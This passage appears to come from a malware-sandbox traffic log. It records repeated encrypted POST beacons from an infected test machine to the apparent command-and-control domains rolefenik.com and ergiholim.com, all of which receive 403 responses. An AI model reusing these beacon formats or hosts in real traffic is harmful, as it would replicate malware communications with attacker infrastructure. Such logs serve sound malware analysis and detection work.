                                                                                                                                          2024-11-13 17:23:25 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          73192.168.2.650068104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:26 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:26 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:27 UTC754INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:26 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VSOXVeC52kxi%2FRdy5quxEBnPOcwY2%2BiwczSgXYxF0GnIwMaqPDUsarstAnApM51Oyl%2F7Ngo%2BBfbPjcOeN8%2Fp1d%2BsHWkEFsaS5J4VXSsTSOkHLpjtswmfDsvZgaUGttnU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207318bfd8d788-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=134927&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=21447&cwnd=32&unsent_bytes=0&cid=286837213be96280&ts=968&x=0"
                                                                                                                                          2024-11-13 17:23:27 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          74192.168.2.650069104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:27 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:27 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:28 UTC754INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:28 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yQGNoPJj4b6FfOmS%2BYwm1LNKHnm6JlviO4g3wRHlASmckX7NPt%2FA%2BVt4QjfeL24KVZbzwsRU8N4%2BgzwqR9DUIyYhdc%2BoetczZuqiNtLbdg%2FAHEC68rQDWjlY4ktlHmZc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20732468f9d78b-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=21075&cwnd=32&unsent_bytes=0&cid=73ddc33a4c9826a8&ts=553&x=0"
                                                                                                                                          2024-11-13 17:23:28 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          75192.168.2.650070104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:29 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:29 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:29 UTC752INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:29 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h492SEKam0kHZsn9UuyKimtDKEKIP36gJCpHdbdJxynH2DJf%2FGr%2BU7bbaqEayy%2Fs44XC4jEDRVPHYp6%2FpCN3Y4WZMzQbBWhQ%2FVo9O1wkmSmFgYbeUdYX7npLSQ3xJBeW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20732dcc24f675-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=138745&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=18395&cwnd=32&unsent_bytes=0&cid=28bb09f686d417be&ts=553&x=0"
                                                                                                                                          2024-11-13 17:23:29 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          76192.168.2.650071104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:30 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:30 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:31 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:31 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UgOy7b8h9ZPo%2BOPQ9nXPf2tUt8QWHOYqWaHtpM2DervZ9RJNJLPG43P07W1FB7n683mGTThlhTjYOHHs%2BHGyDuhpp6c%2B4xr74XXiKOL1NaAXJbaKfaJKBf2jx6SpCLGL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207336ffe1d74b-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=131061&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=22098&cwnd=32&unsent_bytes=0&cid=4501c5613c3f94c9&ts=615&x=0"
                                                                                                                                          2024-11-13 17:23:31 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          77192.168.2.650072104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:32 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:32 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:32 UTC752INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:32 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WCZI4zr%2FOT5u9EnGAYUPHs%2BuvBjmDNi0bwxRw2WS8t0i37k04eRVN%2FLwKWX8VMOEJm2E8C8X%2FAU%2BtwvrFxlHtvruMZbP4frLcp5JZUjoAvNTPH8KJQVvsZmq4Iwl162"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20733fbb226bc8-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=981&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2861660&cwnd=235&unsent_bytes=0&cid=7f679857cbd07a7a&ts=417&x=0"
                                                                                                                                          2024-11-13 17:23:32 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          78192.168.2.650074104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:33 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:33 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:34 UTC744INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:34 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=whIsG8DA0uyqXXPGqgI0f6E9Knl38Mk9pax1SjHnVCAGboHXedOX227srRQY2iGR3rm9rMu1hGagWeWOvtkSBAwGBLsZFcV6lW915U%2FbYC7bWJQg7fxg9HcUKUj98Zgp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073484b78e3a5-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=138035&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=19439&cwnd=32&unsent_bytes=0&cid=f4bd36db14e8d446&ts=831&x=0"
                                                                                                                                          2024-11-13 17:23:34 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          79192.168.2.650076104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:35 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
